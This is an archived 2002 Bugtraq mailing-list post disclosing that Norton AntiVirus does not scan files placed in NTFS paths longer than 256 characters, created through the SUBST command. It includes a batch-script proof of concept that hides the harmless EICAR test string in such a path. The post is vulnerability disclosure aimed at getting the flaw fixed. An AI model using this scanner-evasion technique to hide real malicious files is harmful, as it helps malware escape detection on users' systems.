Bugtraq mailing list archives

Long path exploit on NTFS

From: hans.somers () nl abnamro com
Date: Wed, 30 Jan 2002 09:33:33 +0100



Long path exploit on NTFS
=====================
The filesystem NTFS seems to be a hiding place for virusses if you use a

file path which

exceeds 256 charaters.

What is the case?
The filepath (drive + folderpath + filename) theoraticly can take up to

32000 charaters if

the filesystem in use is NTFS. However, the way in wich Windows NT (4.0,

2000 and

XP) access this filesystem a maximum of 256 characters is in place. If

you try to go

deeper, you will experience a "Path too long" error.
In these Operating System there is a way to substitute a long folderpath,

using

the "SUBST" command. If you change your current drive to the substituted

drive, the

pathlength is reset to 3 (Q:\ e.g.) and Windows NT allows you to create

an even deeper

path.
Normally this would not alarm anyone, however, i discovered that my

favorite

virusscanner (Norton AntiVirus) was not able to follow the deep path

where i created the

EICAR-test string. So i created a very simple batchfile to demonstrate

this exploit.

My virusscanner will only find this virus is the SUBST drive is availible

during the scan.


I have tested this on the following platforms:
Windows NT 4.0 SP4
Windows NT 4.0 SP6a
Windows 2000 Professional SP2
Windows XP Pro
I have determined that the following versions of Norton AntiVirus will

not follow

the deep path during a complete scan:
Norton AntiVirus 5.0
Norton AntiVirus 7.5.1
Norton Antivirus 8.00.58

I suspect that other virusscanners will encounter the same "bug" so you

might try the

sample script that i created. Additionally, other tools (quotamanagers,

inventory tools

etc) that gather information from a NTFS partition might reveal the same

bug.


After running the script below, remove the substituted drive (SUBST Q:

/D) and run a

full scan on your C-partition. I suspect that the Eicar-virus will not be

found.

Additionally, re-create the substituted drive and re-run the scan. Under

normal conditions

the Eicar-virus will be found and removed (depending on your settings).

As far as i can see, there is no real remedy against this exploit. I hope

this message will

pass through the proper channels, so the responsible parties will act on

this.


Responses on this posting at my address are welcome.


Hans Somers (hans.somers () nl abnamro com)

Sample script:
===========
@echo off
cls
echo Start test-script NTFS-limit
@echo Create a filepath to the limit of NTFS
md
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
123456789
cd
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
123456789
@echo Create the Eicar test-string for PoC. This should be detected

normally if you

have an active virusscanner.
echo
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

EICAR.TXT

echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR1.COM >NUL
@echo Create a subst-drive Q: for this path
subst Q:
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
123456789
@echo Create e even deeper filepath (thus exceeding the limit of NTFS's

explorer)

md Q:\1234567890\1234567890\1234567890
@echo Change current folder into "the deep"
Q:
cd Q:\1234567890\1234567890\1234567890
@echo Create the Eicar test-string
echo
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

EICAR.TXT

echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR2.COM >NUL
EICAR2.COM
echo .
echo End of test-script

---------------------------------------------------------------------------
This  message  (including  any  attachments)  is  confidential  and  may be
privileged.  If you have received it by mistake please notify the sender by
return  e-mail  and  delete this message from your system. Any unauthorised
use  or  dissemination  of  this  message  in  whole or in part is strictly
prohibited.  Please  note  that e-mails are susceptible to change. ABN AMRO
Bank  N.V.  (including  its  group  companies)  shall not be liable for the
improper  or  incomplete  transmission of the information contained in this
communication  nor  for  any delay in its receipt or damage to your system.
ABN  AMRO  Bank  N.V.  (or its group companies) does not guarantee that the
integrity   of  this  communication  has  been  maintained  nor  that  this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

Current thread:

Long path exploit on NTFS hans . somers (Jan 30)
- RE: Long path exploit on NTFS Gavin Lowe (Jan 30)
- RE: Long path exploit on NTFS David LeBlanc (Jan 31)
- <Possible follow-ups>
- RE: Long path exploit on NTFS Leif Sawyer (Jan 30)
- RE: Long path exploit on NTFS Moorhouse, Walt P (Jan 31)